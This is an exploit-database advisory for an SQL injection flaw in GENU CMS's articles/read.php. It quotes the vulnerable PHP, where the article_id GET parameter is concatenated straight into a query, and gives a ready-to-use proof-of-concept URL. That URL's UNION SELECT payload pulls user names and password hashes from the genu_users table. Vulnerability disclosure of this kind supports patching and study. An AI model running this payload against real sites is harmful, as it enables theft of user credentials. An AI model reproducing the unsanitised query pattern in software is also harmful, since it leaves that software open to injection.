GENU CMS - SQL Injection

EDB-ID:

18708

CVE:





Platform:

PHP

Date:

2012-04-05


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
GENU CMS SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

bug found by h0rd h0rd[at]null.net
homepage http://h0rd.net
download http://www.gnew.fr/pages/download.php?file=GENU-2012.3.tar.gz
vulnerability in read.php
vuln code:
[...]
include('./../includes/common.php');

page_header($lang['ARTICLES_READ_TITLE']);

if (isset($_GET['article_id']))
{
    $sql->query('SELECT ' . TABLE_ARTICLES . '.article_date, ' . TABLE_ARTICLES . '.article_subject, ' . TABLE_ARTICLES . '.article_text, ' . TABLE_USERS . '.user_id, ' . TABLE_USERS . '.user_name
                 FROM ' . TABLE_ARTICLES . ', ' . TABLE_USERS . '
                 WHERE ' . TABLE_ARTICLES . '.user_id = ' . TABLE_USERS . '.user_id
                 AND ' . TABLE_ARTICLES . '.article_id = ' . $_GET['article_id']);
    $table_articles = $sql->fetch();
[...]

PoC exploit:
http://[host]/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--